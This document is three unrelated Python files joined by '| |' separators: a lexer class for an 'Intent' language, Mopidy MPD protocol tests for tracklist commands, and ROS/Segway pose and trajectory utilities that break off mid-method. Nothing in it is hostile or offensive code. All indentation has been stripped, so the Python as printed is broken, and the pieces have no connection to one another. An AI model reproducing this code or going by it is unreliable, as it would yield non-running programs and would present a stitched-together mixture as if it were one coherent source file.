def get_tokens_unprocessed(self, txt):
'''
Return an iterable of (index, tokentype, value) tuples where index is the
starting position of the token within the input text.
'''
end_of_string = len(txt)
begin = 0
start_statement = True
while begin < end_of_string:
ttype = None
c = txt[begin]
if c in ' \t\r\n':
end = IntentLexer._end_of_whitespace(txt, begin + 1, end_of_string)
ttype = Text
start_statement = txt.find('\n', begin, end) > -1 or txt.find('\r', begin, end) > -1
elif c in '#|':
end = IntentLexer._end_of_statement(txt, begin + 1, end_of_string)
ttype = Comment
elif c == '`':
end = txt.find('`', begin + 1)
if end == -1:
end = end_of_string
else:
end += 1
ttype = String.Backtick
elif c == '~':
ttype = Punctuation
end = begin + 1
if begin + 1 < end_of_string:
nxt = txt[begin + 1]
if nxt.isalpha() or nxt in '+-':
end = IntentLexer._end_of_phrase(txt, begin + 2, end_of_string)
ttype = Name.Decorator
elif nxt in "\"'":
end, ttype = IntentLexer._handle_quoted(txt, begin, end_of_string)
start_statement = False
elif c in '+-':
ttype = Punctuation
end = begin + 1
if begin + 1 < end_of_string:
nxt = txt[begin + 1]
if nxt.isalpha():
end = IntentLexer._end_of_phrase(txt, begin + 2, end_of_string)
ttype = Name.Decorator
elif nxt.isdigit():
end, ttype = IntentLexer._handle_number(txt, begin, end_of_string)
elif nxt == '.':
if begin + 2 < end and txt[begin + 2].isdigit():
end, ttype = IntentLexer._handle_number(txt, begin, end_of_string)
start_statement = False
elif c in '*/%&^\\[],=():.<>{}?':
ttype = Punctuation
end = begin + 1
start_statement = False
elif c == '"':
end, ttype = IntentLexer._handle_quoted(txt, begin, end_of_string)
start_statement = False
elif c.isdigit():
end, ttype = IntentLexer._handle_number(txt, begin, end_of_string)
start_statement = False
elif c.isalpha():
if c.isupper():
start_statement = False
ttype = Name.Function
end = IntentLexer._end_of_phrase(txt, begin + 1, end_of_string)
phrase = txt[begin:end]
if phrase.isupper():
ttype = Name.Constant
elif start_statement:
for tuple in IntentLexer.handle_first_word(txt, begin, end_of_string):
yield tuple
begin += len(tuple[2])
start_statement = False
continue
else:
end = IntentLexer._end_of_phrase(txt, begin + 1, end_of_string)
ttype = Name.Variable
else:
ttype = Error
end = IntentLexer._end_of_line(txt, begin + 1, end_of_string)
start_statement = True
if ttype is None:
break
yield (begin, ttype, txt[begin:end])
begin = end
block_start_pat = re.compile(r'(if|for|with|while|try|catch|handle|when|else|lock|use)(\s+[^:]+):')
end_pat = re.compile('end(\\s+[^\r\n]+)$', re.MULTILINE)
@staticmethod
def handle_first_word(txt, i, end_of_string):
end = i
end_of_statement = IntentLexer._end_of_statement(txt, i, end_of_string)
# Is the first word in this statement one of the reserved statement starters?
m = IntentLexer.block_start_pat.match(txt, i, end_of_statement)
if m:
yield (i, Keyword.Reserved, txt[i:m.end(1)])
# Is this block "explained" with an inline comment?
j = txt.find('(', m.end(1), end_of_statement)
if j > -1:
k = txt.find(')', j + 1, end_of_statement)
if k == -1:
yield(m.end(1), Error, txt[m.end(1):end_of_statement])
else:
yield(m.end(1), Comment, txt[m.end(1):j])
else:
m = IntentLexer.end_pat.match(txt, i, end_of_statement)
if m:
yield(i, Keyword.Reserved, txt[i:i+3])
if m.group(1):
yield(m.start(1), Comment, txt[m.start(1):m.end(1)])
end = m.end(1)
else:
end = IntentLexer._end_of_phrase(txt, i + 1, end_of_string)
yield(i, Name.Variable, txt[i:end])
@staticmethod
def _handle_number(txt, i, end, ttype=Number):
digit_chars = '0123456789'
c = txt[i]
if c in '-+':
i += 1
if i >= end:
return end, Error
c = txt[i]
if c == '0':
if i + 1 < end:
nxt = txt[i + 1].lower()
if nxt == 'b':
digit_chars = '01'
dot = False
ttype = Number.Binary
i += 1
elif nxt == 'x':
digit_chars = '0123456789abcdefABCDEF'
dot = False
ttype = Number.Hex
i += 1
elif nxt in '01234567':
digit_chars = '01234567'
dot = False
ttype = Number.Oct
i += 1
elif nxt == '.':
dot = True
ttype = Number.Float
i += 1
elif nxt == '_':
pass
else:
return i + 1, Number.Integer
else:
return i + 1, Number.Integer
last_was_digit = True
i += 1
while i < end:
c = txt[i]
if c == '.':
if ttype is Number:
ttype = Number.Float
last_was_digit = False
elif ttype is Number.Float:
# Second dot is a problem; truncate number here
return i, Number.Float
else:
# We're reading binary, hex, or octal; truncate here
return i, ttype
elif c == '_':
# Grouping symbol is valid as long as surrounded by digits
if not last_was_digit:
return i, ttype
last_was_digit = False
elif c in digit_chars:
last_was_digit = True
elif c in 'eE' and (ttype is Number.Float or ttype is Number) and i + 1 < end and txt[i + 1] in '-=0123456789':
end, ignored = IntentLexer._handle_number(txt, i + 1, end, None)
return end, Number.Float
else:
return i, ttype
i += 1
return end, ttype
@staticmethod
def _handle_quoted(txt, i, end):
c = txt[i]
stop = IntentLexer._end_of_quoted(txt, i + 1, end)
if c == '"':
ttype = String.Double
else:
if stop == i + 3:
ttype = String.Char
else:
ttype = String.Single
return stop, ttype
@staticmethod
def _end_of_whitespace(txt, i, end):
while i < end:
if txt[i] not in ' \t\r\n':
return i
i += 1
return end
@staticmethod
def _end_of_spaces_and_tabs(txt, i, end):
while i < end:
if txt[i] not in ' \t':
return i
i += 1
return end
@staticmethod
def _end_of_line(txt, i, end):
'''Find end of line in txt.'''
while i < end:
c = txt[i]
if c == '\n':
return i
elif c == '\r':
if i + 1 < end and txt[i + 1] == '\n':
return i + 1
return i
i += 1
return end
@staticmethod
def _at_soft_break(txt, i, end):
return i <= end - 3 and txt[i] == '.' and txt[i + 1] == '.' and txt[i + 2] == '.'
@staticmethod
def _end_of_statement(txt, i, end):
'''Find end of current statement in txt.'''
nxt = i
# Go to end of current line. Then peek to see if next line begins
# with an ellipsis (soft line break). If yes, keep expanding boundaries
# of statement. Otherwise, stop.
while True:
eol = IntentLexer._end_of_line(txt, nxt, end)
if eol == end:
break
nxt = IntentLexer._end_of_spaces_and_tabs(txt, eol + 1, end)
if nxt == end or not IntentLexer._at_soft_break(txt, nxt, end):
return eol
return end
@staticmethod
def _end_of_soft_breakable_whitespace(txt, i, end):
'''Find end of whitespace, including soft line breaks.'''
while True:
j = IntentLexer._end_of_spaces_and_tabs(txt, i, end)
if j == end:
return j
c = txt[j]
position = j
if c == '\r':
# If we don't have room for ellipsis
if j > end - 4:
return j
if txt[j + 1] == '\n':
position += 1
if c == '\n':
# Peek to see what comes next.
nxt = IntentLexer._end_of_spaces_and_tabs(txt, position + 1, end)
if nxt == end or not IntentLexer._at_soft_break(txt, nxt, end):
return j
else:
return j
@staticmethod
def _end_of_phrase(txt, i, end):
while i < end:
c = txt[i]
# Alphanumerics, underscore, and extended chars can appear
# freely in phrases. Other stuff has special rules that require
# lookahead.
if (not c.isalnum()) and (c != '_') and ord(c) < 128:
# Consecutive whitespace gets collapsed to a single space; this
# makes line wrapping much less messy to manage. Whitespace chars
# can't be the final char of a phrase.
if c in ' \t':
j = IntentLexer._end_of_soft_breakable_whitespace(txt, i, end)
if j + 1 >= end or not txt[j].isalnum():
return i
i = j
# Hyphenated words are fine in phrases, but not at the end
elif c == '-':
if i + 1 == end or not txt[i + 1].isalnum():
return i
else:
return i
i += 1
return end
@staticmethod
def _end_of_digits(txt, i, end):
'''
Find end of a run of digits in txt.
'''
while i < end:
if not txt[i].isdigit():
return i
i += 1
return end
@staticmethod
def _end_of_quoted(txt, i, end):
'''
Find end of a quoted string "..." in txt.
'''
while i < end:
c = txt[i]
if c == '\\':
i += 1
elif c == '"':
return i + 1
i += 1
return end
if __name__ == '__main__':
while True:
#print('\nEnter some code.')
#code = raw_input()
with open('/tmp/x.i', 'r') as f:
code = f.read()
if not code:
break
lx = IntentLexer()
for idx, ttype, val in lx.get_tokens_unprocessed(code):
print('%04d %s "%s"' % (idx, ttype, val))
break
| |
from __future__ import absolute_import, unicode_literals
from mopidy.internal import deprecation
from mopidy.models import Ref, Track
from tests.mpd import protocol
class AddCommandsTest(protocol.BaseTestCase):
def setUp(self): # noqa: N802
super(AddCommandsTest, self).setUp()
self.tracks = [Track(uri='dummy:/a', name='a'),
Track(uri='dummy:/foo/b', name='b')]
self.refs = {'/a': Ref.track(uri='dummy:/a', name='a'),
'/foo': Ref.directory(uri='dummy:/foo', name='foo'),
'/foo/b': Ref.track(uri='dummy:/foo/b', name='b')}
self.backend.library.dummy_library = self.tracks
def test_add(self):
for track in [self.tracks[0], self.tracks[0], self.tracks[1]]:
self.send_request('add "%s"' % track.uri)
self.assertEqual(len(self.core.tracklist.tracks.get()), 3)
self.assertEqual(self.core.tracklist.tracks.get()[2], self.tracks[1])
self.assertEqualResponse('OK')
def test_add_with_uri_not_found_in_library_should_ack(self):
self.send_request('add "dummy://foo"')
self.assertEqualResponse(
'ACK [50@0] {add} directory or file not found')
def test_add_with_empty_uri_should_not_add_anything_and_ok(self):
self.backend.library.dummy_browse_result = {
'dummy:/': [self.refs['/a']]}
self.send_request('add ""')
self.assertEqual(len(self.core.tracklist.tracks.get()), 0)
self.assertInResponse('OK')
def test_add_with_library_should_recurse(self):
self.backend.library.dummy_browse_result = {
'dummy:/': [self.refs['/a'], self.refs['/foo']],
'dummy:/foo': [self.refs['/foo/b']]}
self.send_request('add "/dummy"')
self.assertEqual(self.core.tracklist.tracks.get(), self.tracks)
self.assertInResponse('OK')
def test_add_root_should_not_add_anything_and_ok(self):
self.backend.library.dummy_browse_result = {
'dummy:/': [self.refs['/a']]}
self.send_request('add "/"')
self.assertEqual(len(self.core.tracklist.tracks.get()), 0)
self.assertInResponse('OK')
def test_addid_without_songpos(self):
for track in [self.tracks[0], self.tracks[0], self.tracks[1]]:
self.send_request('addid "%s"' % track.uri)
tl_tracks = self.core.tracklist.tl_tracks.get()
self.assertEqual(len(tl_tracks), 3)
self.assertEqual(tl_tracks[2].track, self.tracks[1])
self.assertInResponse('Id: %d' % tl_tracks[2].tlid)
self.assertInResponse('OK')
def test_addid_with_songpos(self):
for track in [self.tracks[0], self.tracks[0]]:
self.send_request('add "%s"' % track.uri)
self.send_request('addid "%s" "1"' % self.tracks[1].uri)
tl_tracks = self.core.tracklist.tl_tracks.get()
self.assertEqual(len(tl_tracks), 3)
self.assertEqual(tl_tracks[1].track, self.tracks[1])
self.assertInResponse('Id: %d' % tl_tracks[1].tlid)
self.assertInResponse('OK')
def test_addid_with_songpos_out_of_bounds_should_ack(self):
self.send_request('addid "%s" "3"' % self.tracks[0].uri)
self.assertEqualResponse('ACK [2@0] {addid} Bad song index')
def test_addid_with_empty_uri_acks(self):
self.send_request('addid ""')
self.assertEqualResponse('ACK [50@0] {addid} No such song')
def test_addid_with_uri_not_found_in_library_should_ack(self):
self.send_request('addid "dummy://foo"')
self.assertEqualResponse('ACK [50@0] {addid} No such song')
class BasePopulatedTracklistTestCase(protocol.BaseTestCase):
def setUp(self): # noqa: N802
super(BasePopulatedTracklistTestCase, self).setUp()
tracks = [Track(uri='dummy:/%s' % x, name=x) for x in 'abcdef']
self.backend.library.dummy_library = tracks
self.core.tracklist.add(uris=[t.uri for t in tracks])
class DeleteCommandsTest(BasePopulatedTracklistTestCase):
def test_clear(self):
self.send_request('clear')
self.assertEqual(len(self.core.tracklist.tracks.get()), 0)
self.assertEqual(self.core.playback.current_track.get(), None)
self.assertInResponse('OK')
def test_delete_songpos(self):
tl_tracks = self.core.tracklist.tl_tracks.get()
self.send_request('delete "%d"' % tl_tracks[1].tlid)
self.assertEqual(len(self.core.tracklist.tracks.get()), 5)
self.assertInResponse('OK')
def test_delete_songpos_out_of_bounds(self):
self.send_request('delete "8"')
self.assertEqual(len(self.core.tracklist.tracks.get()), 6)
self.assertEqualResponse('ACK [2@0] {delete} Bad song index')
def test_delete_open_range(self):
self.send_request('delete "1:"')
self.assertEqual(len(self.core.tracklist.tracks.get()), 1)
self.assertInResponse('OK')
# TODO: check how this should work.
# def test_delete_open_upper_range(self):
# self.send_request('delete ":8"')
# self.assertEqual(len(self.core.tracklist.tracks.get()), 0)
# self.assertInResponse('OK')
def test_delete_closed_range(self):
self.send_request('delete "1:3"')
self.assertEqual(len(self.core.tracklist.tracks.get()), 4)
self.assertInResponse('OK')
def test_delete_entire_range_out_of_bounds(self):
self.send_request('delete "8:9"')
self.assertEqual(len(self.core.tracklist.tracks.get()), 6)
self.assertEqualResponse('ACK [2@0] {delete} Bad song index')
def test_delete_upper_range_out_of_bounds(self):
self.send_request('delete "5:9"')
self.assertEqual(len(self.core.tracklist.tracks.get()), 5)
self.assertEqualResponse('OK')
def test_deleteid(self):
self.send_request('deleteid "1"')
self.assertEqual(len(self.core.tracklist.tracks.get()), 5)
self.assertInResponse('OK')
def test_deleteid_does_not_exist(self):
self.send_request('deleteid "12345"')
self.assertEqual(len(self.core.tracklist.tracks.get()), 6)
self.assertEqualResponse('ACK [50@0] {deleteid} No such song')
class MoveCommandsTest(BasePopulatedTracklistTestCase):
def test_move_songpos(self):
self.send_request('move "1" "0"')
result = [t.name for t in self.core.tracklist.tracks.get()]
self.assertEqual(result, ['b', 'a', 'c', 'd', 'e', 'f'])
self.assertInResponse('OK')
def test_move_open_range(self):
self.send_request('move "2:" "0"')
result = [t.name for t in self.core.tracklist.tracks.get()]
self.assertEqual(result, ['c', 'd', 'e', 'f', 'a', 'b'])
self.assertInResponse('OK')
def test_move_closed_range(self):
self.send_request('move "1:3" "0"')
result = [t.name for t in self.core.tracklist.tracks.get()]
self.assertEqual(result, ['b', 'c', 'a', 'd', 'e', 'f'])
self.assertInResponse('OK')
def test_moveid(self):
self.send_request('moveid "4" "2"')
result = [t.name for t in self.core.tracklist.tracks.get()]
self.assertEqual(result, ['a', 'b', 'e', 'c', 'd', 'f'])
self.assertInResponse('OK')
def test_moveid_with_tlid_not_found_in_tracklist_should_ack(self):
self.send_request('moveid "9" "0"')
self.assertEqualResponse(
'ACK [50@0] {moveid} No such song')
class PlaylistFindCommandTest(protocol.BaseTestCase):
def test_playlistfind(self):
self.send_request('playlistfind "tag" "needle"')
self.assertEqualResponse('ACK [0@0] {playlistfind} Not implemented')
def test_playlistfind_by_filename_not_in_tracklist(self):
self.send_request('playlistfind "filename" "file:///dev/null"')
self.assertEqualResponse('OK')
def test_playlistfind_by_filename_without_quotes(self):
self.send_request('playlistfind filename "file:///dev/null"')
self.assertEqualResponse('OK')
def test_playlistfind_by_filename_in_tracklist(self):
track = Track(uri='dummy:///exists')
self.backend.library.dummy_library = [track]
self.core.tracklist.add(uris=[track.uri])
self.send_request('playlistfind filename "dummy:///exists"')
self.assertInResponse('file: dummy:///exists')
self.assertInResponse('Id: 0')
self.assertInResponse('Pos: 0')
self.assertInResponse('OK')
class PlaylistIdCommandTest(BasePopulatedTracklistTestCase):
def test_playlistid_without_songid(self):
self.send_request('playlistid')
self.assertInResponse('Title: a')
self.assertInResponse('Title: b')
self.assertInResponse('OK')
def test_playlistid_with_songid(self):
self.send_request('playlistid "1"')
self.assertNotInResponse('Title: a')
self.assertNotInResponse('Id: 0')
self.assertInResponse('Title: b')
self.assertInResponse('Id: 1')
self.assertInResponse('OK')
def test_playlistid_with_not_existing_songid_fails(self):
self.send_request('playlistid "25"')
self.assertEqualResponse('ACK [50@0] {playlistid} No such song')
class PlaylistInfoCommandTest(BasePopulatedTracklistTestCase):
def test_playlist_returns_same_as_playlistinfo(self):
with deprecation.ignore('mpd.protocol.current_playlist.playlist'):
playlist_response = self.send_request('playlist')
playlistinfo_response = self.send_request('playlistinfo')
self.assertEqual(playlist_response, playlistinfo_response)
def test_playlistinfo_without_songpos_or_range(self):
self.send_request('playlistinfo')
self.assertInResponse('Title: a')
self.assertInResponse('Pos: 0')
self.assertInResponse('Title: b')
self.assertInResponse('Pos: 1')
self.assertInResponse('Title: c')
self.assertInResponse('Pos: 2')
self.assertInResponse('Title: d')
self.assertInResponse('Pos: 3')
self.assertInResponse('Title: e')
self.assertInResponse('Pos: 4')
self.assertInResponse('Title: f')
self.assertInResponse('Pos: 5')
self.assertInResponse('OK')
def test_playlistinfo_with_songpos(self):
# Make the track's CPID not match the playlist position
self.core.tracklist.tlid = 17
self.send_request('playlistinfo "4"')
self.assertNotInResponse('Title: a')
self.assertNotInResponse('Pos: 0')
self.assertNotInResponse('Title: b')
self.assertNotInResponse('Pos: 1')
self.assertNotInResponse('Title: c')
self.assertNotInResponse('Pos: 2')
self.assertNotInResponse('Title: d')
self.assertNotInResponse('Pos: 3')
self.assertInResponse('Title: e')
self.assertInResponse('Pos: 4')
self.assertNotInResponse('Title: f')
self.assertNotInResponse('Pos: 5')
self.assertInResponse('OK')
def test_playlistinfo_with_negative_songpos_same_as_playlistinfo(self):
response1 = self.send_request('playlistinfo "-1"')
response2 = self.send_request('playlistinfo')
self.assertEqual(response1, response2)
def test_playlistinfo_with_open_range(self):
self.send_request('playlistinfo "2:"')
self.assertNotInResponse('Title: a')
self.assertNotInResponse('Pos: 0')
self.assertNotInResponse('Title: b')
self.assertNotInResponse('Pos: 1')
self.assertInResponse('Title: c')
self.assertInResponse('Pos: 2')
self.assertInResponse('Title: d')
self.assertInResponse('Pos: 3')
self.assertInResponse('Title: e')
self.assertInResponse('Pos: 4')
self.assertInResponse('Title: f')
self.assertInResponse('Pos: 5')
self.assertInResponse('OK')
def test_playlistinfo_with_closed_range(self):
self.send_request('playlistinfo "2:4"')
self.assertNotInResponse('Title: a')
self.assertNotInResponse('Title: b')
self.assertInResponse('Title: c')
self.assertInResponse('Title: d')
self.assertNotInResponse('Title: e')
self.assertNotInResponse('Title: f')
self.assertInResponse('OK')
def test_playlistinfo_with_too_high_start_of_range_returns_arg_error(self):
self.send_request('playlistinfo "10:20"')
self.assertEqualResponse('ACK [2@0] {playlistinfo} Bad song index')
def test_playlistinfo_with_too_high_end_of_range_returns_ok(self):
self.send_request('playlistinfo "0:20"')
self.assertInResponse('OK')
def test_playlistinfo_with_zero_returns_ok(self):
self.send_request('playlistinfo "0"')
self.assertInResponse('OK')
class PlaylistSearchCommandTest(protocol.BaseTestCase):
def test_playlistsearch(self):
self.send_request('playlistsearch "any" "needle"')
self.assertEqualResponse('ACK [0@0] {playlistsearch} Not implemented')
def test_playlistsearch_without_quotes(self):
self.send_request('playlistsearch any "needle"')
self.assertEqualResponse('ACK [0@0] {playlistsearch} Not implemented')
class PlChangeCommandTest(BasePopulatedTracklistTestCase):
def test_plchanges_with_lower_version_returns_changes(self):
self.send_request('plchanges "0"')
self.assertInResponse('Title: a')
self.assertInResponse('Title: b')
self.assertInResponse('Title: c')
self.assertInResponse('OK')
def test_plchanges_with_equal_version_returns_nothing(self):
self.assertEqual(self.core.tracklist.version.get(), 1)
self.send_request('plchanges "1"')
self.assertNotInResponse('Title: a')
self.assertNotInResponse('Title: b')
self.assertNotInResponse('Title: c')
self.assertInResponse('OK')
def test_plchanges_with_greater_version_returns_nothing(self):
self.assertEqual(self.core.tracklist.version.get(), 1)
self.send_request('plchanges "2"')
self.assertNotInResponse('Title: a')
self.assertNotInResponse('Title: b')
self.assertNotInResponse('Title: c')
self.assertInResponse('OK')
def test_plchanges_with_minus_one_returns_entire_playlist(self):
self.send_request('plchanges "-1"')
self.assertInResponse('Title: a')
self.assertInResponse('Title: b')
self.assertInResponse('Title: c')
self.assertInResponse('OK')
def test_plchanges_without_quotes_works(self):
self.send_request('plchanges 0')
self.assertInResponse('Title: a')
self.assertInResponse('Title: b')
self.assertInResponse('Title: c')
self.assertInResponse('OK')
def test_plchangesposid(self):
self.send_request('plchangesposid "0"')
tl_tracks = self.core.tracklist.tl_tracks.get()
self.assertInResponse('cpos: 0')
self.assertInResponse('Id: %d' % tl_tracks[0].tlid)
self.assertInResponse('cpos: 2')
self.assertInResponse('Id: %d' % tl_tracks[1].tlid)
self.assertInResponse('cpos: 2')
self.assertInResponse('Id: %d' % tl_tracks[2].tlid)
self.assertInResponse('OK')
# TODO: we only seem to be testing that don't touch the non shuffled region :/
class ShuffleCommandTest(BasePopulatedTracklistTestCase):
def test_shuffle_without_range(self):
version = self.core.tracklist.version.get()
self.send_request('shuffle')
self.assertLess(version, self.core.tracklist.version.get())
self.assertInResponse('OK')
def test_shuffle_with_open_range(self):
version = self.core.tracklist.version.get()
self.send_request('shuffle "4:"')
self.assertLess(version, self.core.tracklist.version.get())
result = [t.name for t in self.core.tracklist.tracks.get()]
self.assertEqual(result[:4], ['a', 'b', 'c', 'd'])
self.assertInResponse('OK')
def test_shuffle_with_closed_range(self):
version = self.core.tracklist.version.get()
self.send_request('shuffle "1:3"')
self.assertLess(version, self.core.tracklist.version.get())
result = [t.name for t in self.core.tracklist.tracks.get()]
self.assertEqual(result[:1], ['a'])
self.assertEqual(result[3:], ['d', 'e', 'f'])
self.assertInResponse('OK')
class SwapCommandTest(BasePopulatedTracklistTestCase):
def test_swap(self):
self.send_request('swap "1" "4"')
result = [t.name for t in self.core.tracklist.tracks.get()]
self.assertEqual(result, ['a', 'e', 'c', 'd', 'b', 'f'])
self.assertInResponse('OK')
def test_swapid(self):
self.send_request('swapid "1" "4"')
result = [t.name for t in self.core.tracklist.tracks.get()]
self.assertEqual(result, ['a', 'e', 'c', 'd', 'b', 'f'])
self.assertInResponse('OK')
def test_swapid_with_first_id_unknown_should_ack(self):
self.send_request('swapid "0" "8"')
self.assertEqualResponse(
'ACK [50@0] {swapid} No such song')
def test_swapid_with_second_id_unknown_should_ack(self):
self.send_request('swapid "8" "0"')
self.assertEqualResponse(
'ACK [50@0] {swapid} No such song')
| |
from __future__ import division
import numpy as np
import datetime
import rosbag
import rospy
from copy import copy, deepcopy
from exceptions import KeyError, ValueError
from segway_rmp.msg import SegwayStatusStamped
from geometry_msgs.msg import PoseStamped
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from math import cos, sin, tan, exp
from tf import transformations as trafo
ndtFName = '/home/sujiwo/ORB_SLAM/Data/20151106-1/ndt.csv'
orbFName = '/home/sujiwo/ORB_SLAM/Data/20151106-1/orb-slam.csv'
def ClosestPointInLine (PointA, PointB, pointChk, ifPointInLine=None):
ap = pointChk.coord() - PointA.coord()
ab = PointB.coord() - PointA.coord()
cs = (np.dot(ap, ab) / np.dot(ab, ab))
ptx = PointA.coord() + ab * cs
retval = Pose(pointChk.timestamp, \
ptx[0], ptx[1], ptx[2], \
pointChk.qx, pointChk.qy, pointChk.qz, pointChk.qw)
if ifPointInLine is None :
return retval
else :
return retval, cs
class Pose :
def __init__ (self, t=0, _x=0, _y=0, _z=0, _qx=0, _qy=0, _qz=0, _qw=1):
try:
self.timestamp = t[0]
self.x = t[1]
self.y = t[2]
self.z = t[3]
self.qx = t[4]
self.qy = t[5]
self.qz = t[6]
self.qw = t[7]
except (TypeError, IndexError):
self.timestamp = t
self.x = _x
self.y = _y
self.z = _z
self.qx = _qx
self.qy = _qy
self.qz = _qz
self.qw = _qw
def plot (self, size=50, **kwargs):
return plt.scatter(self.x, self.y, s=size, linewidths=0, **kwargs)
@staticmethod
# RPY must be in Radian
def xyzEuler (x, y, z, roll, pitch, yaw, timestamp=0):
pose = Pose (timestamp, x, y, z)
qt = trafo.quaternion_from_euler(roll, pitch, yaw)
pose.qx = qt[0]
pose.qy = qt[1]
pose.qz = qt[2]
pose.qw = qt[3]
return pose
def quaternion (self):
return np.array([self.qx, self.qy, self.qz, self.qw])
def __str__ (self):
return "X={}, Y={}, Z={}, Qx={}, Qy={}, Qz={}, Qw={}".format(self.x, self.y, self.z, self.qx, self.qy, self.qz, self.qw)
def time (self):
return datetime.datetime.fromtimestamp(self.timestamp)
def offsetTime (self, t):
self.timestamp += t
def coord (self):
return np.array([self.x, self.y, self.z])
def rot (self):
return np.array([self.qx, self.qy, self.qz, self.qw])
def __sub__ (self, p1):
return np.array([self.x-p1.x, self.y-p1.y, self.z-p1.z])
# Only calculate movement, but does not overwrite the values
# currentTimestamp must be in second
def segwayMove (self, currentTimestamp, leftWheelVelocity, rightWheelVelocity, yawRate):
# this is minimum speed to consider yaw changes (ie. yaw damping)
minSpeed = 0.025
v = (leftWheelVelocity + rightWheelVelocity) / 2
dt = currentTimestamp - self.timestamp
# XXX: May need to change this line
if abs(v) > minSpeed:
w = yawRate #(yawRate+0.011)*0.98
else:
w = 0.0
x = self.x + v*cos(self.theta) * dt
y = self.y + v*sin(self.theta) * dt
theta = self.theta + w * dt
return x, y, theta
@staticmethod
def interpolate (pose1, pose2, ratio):
if (pose1.timestamp > pose2.timestamp) :
raise ValueError ("pose1 timestamp must be > pose2")
td = (pose2.timestamp - pose1.timestamp)
intpose = Pose(pose1.timestamp + ratio*td,
pose1.x + ratio*(pose2.x-pose1.x),
pose1.y + ratio*(pose2.y-pose1.y),
pose1.z + ratio*(pose2.z-pose1.z))
q1 = pose1.quaternion()
q2 = pose2.quaternion()
qInt = trafo.quaternion_slerp(q1, q2, ratio)
intpose.qx, intpose.qy, intpose.qz, intpose.qw = \
qInt[0], qInt[1], qInt[2], qInt[3]
return intpose
@staticmethod
def average (*poses):
avgpose = Pose()
xs = [p.x for p in poses]
ys = [p.y for p in poses]
zs = [p.z for p in poses]
avgpose.x = sum(xs) / len(poses)
avgpose.y = sum(ys) / len(poses)
avgpose.z = sum(zs) / len(poses)
avgpose.timestamp = np.average([p.timestamp for p in poses])
return avgpose
def publish (self, tfBroadCaster, frame1, frame2):
tfBroadCaster.sendTransform(
(self.x, self.y, self.z),
(self.qx, self.qy, self.qz, self.qw),
rospy.Time.from_sec(self.timestamp),
frame1, frame2
)
# Output euler angle in order of: Roll, Pitch, Yaw
def euler (self):
return np.array(trafo.euler_from_quaternion([self.qx, self.qy, self.qz, self.qw]))
def setRPY (self, roll, pitch, yaw):
pass
def distance (self, pose):
return np.linalg.norm([self.x-pose.x, self.y-pose.y, self.z-pose.z])
def inverse (self):
(qx, qy, qz, qw) = np.array([-self.qx, -self.qy, -self.qz, self.qw]) / np.linalg.norm([self.qx, self.qy, self.qz, self.qw])
return Pose(self.timestamp, -self.x, -self.y, -self.z, qx, qy, qz, qw)
def toMat4 (self):
mat4 = np.eye(4)
rotm = trafo.quaternion_matrix([self.qx, self.qy, self.qz, self.qw])
mat4[0:3,3] = (self.x, self.y, self.z)
mat4[0:3, 0:3] = rotm
return mat4
def toRotMat (self):
return trafo.quaternion_matrix([self.qx, self.qy, self.qz, self.qw])
def __mul__ (self, posev):
p = posev.apply(self)
p.timestamp = self.timestamp
return p
def __rmul__ (self, posev):
return self.apply(posev)
# ot * self
def apply (self, ot):
rotmat1 = self.toRotMat()
rotmat2 = ot.toRotMat()
q = trafo.quaternion_from_matrix(rotmat1.dot(rotmat2))
return Pose (self.timestamp,
rotmat1[0][0:3].dot([ot.x, ot.y, ot.z]) + self.x,
rotmat1[1][0:3].dot([ot.x, ot.y, ot.z]) + self.y,
rotmat1[2][0:3].dot([ot.x, ot.y, ot.z]) + self.z,
q[0], q[1], q[2], q[3])
def doApplyMe (self, ot):
p = self.apply(ot)
self.x = p.x
self.y = p.y
self.z = p.z
self.qx = p.qx
self.qy = p.qy
self.qz = p.qz
self.qw = p.qw
def measureErrorLateral (self, groundTruth, timeTolerance=0.1, useZ=False):
def doMeasureDistance (p, q, useZ):
if useZ :
return np.linalg.norm ([p.x-q.x, p.y-q.y, p.z-q.z], 2)
else :
return np.linalg.norm ([p.x-q.x, p.y-q.y], 2)
pMin, pMax = groundTruth.findNearPosesByTime (self, timeTolerance)
# XXX: I know this is Wrong
# if pMin is None or pMax is None:
# return 1000
if pMax is None:
return doMeasureDistance(self, pMin, useZ)
if pMin is None:
return doMeasureDistance(self, pMax, useZ)
# if (pMin is None) or (pMax is None) :
# return -2.0
pointChk, c = ClosestPointInLine(pMin, pMax, self, True)
# Ideal case
if c>=0.0 and c<=1.0:
return doMeasureDistance(pointChk, self, useZ)
# Bad case
elif c<0.0:
return doMeasureDistance(pMin, self, useZ)
# return -3.0
else:
return doMeasureDistance(pMax, self, useZ)
# return -4.0
class PoseTable :
def __init__ (self):
self.table = []
self.idList = {}
self.c = 0
def __setitem__ (self, key, value):
self.table.append (value)
self.idList[key] = self.c
self.c += 1
def __getitem__ (self, key):
p = self.idList[key]
return self.table[p]
def __len__ (self):
return len(self.table)
def __iadd__ (self, offset):
for pose in self.table :
pose.offsetTime (offset)
return self
def __isub__ (self, offset):
return self.__iadd__(-offset)
def append (self, pose):
self.table.append (pose)
ckeys = self.idList.keys()
if (len(ckeys)==0):
ckey = -1
else :
ckey = max (ckeys)
self.idList[ckey+1] = self.c
self.c += 1
def apply (self, poseX):
for pose in self.table:
pose = pose.doApplyMe (poseX)
pass
def length (self, tolerance=0):
"""
Compute distance spanned by this pose. If miliSecTolerance is not specified, \
we assume that there is no gap
"""
totaldist = 0
for p in range(1, len(self.table)):
cpose = self.table[p]
ppose = self.table[p-1]
if (tolerance>0) :
if abs(ppose.timestamp - cpose.timestamp) > tolerance:
print('far')
continue
dist = np.linalg.norm([cpose.x-ppose.x, cpose.y-ppose.y, cpose.z-ppose.z])
totaldist += dist
return totaldist
def lengths (self):
dists = []
for p in range(1, len(self.table)):
cpose = self.table[p]
ppose = self.table[p-1]
dists.append (np.linalg.norm([cpose.x-ppose.x, cpose.y-ppose.y, cpose.z-ppose.z]))
return dists
def timeLengths (self):
timeDists = []
for p in range(1, len(self.table)):
cpose = self.table[p]
ppose = self.table[p-1]
timeDists.append (abs(cpose.timestamp - ppose.timestamp))
return timeDists
def toArray (self, includeTimestamp=False):
if (includeTimestamp==True) :
mlt = [[p.timestamp, p.x, p.y, p.z, p.qx, p.qy, p.qz, p.qw] for p in self.table]
else :
mlt = [[p.x, p.y, p.z, p.qx, p.qy, p.qz, p.qw] for p in self.table]
return np.array(mlt)
def findNearestByTime (self, pose, tolerance=0):
if (pose.timestamp < self.table[0].timestamp) :
raise KeyError ("Timestamp less than table")
if (pose.timestamp > self.table[self.c-1].timestamp) :
raise KeyError ("Timestamp is outside table: " + str(pose.timestamp))
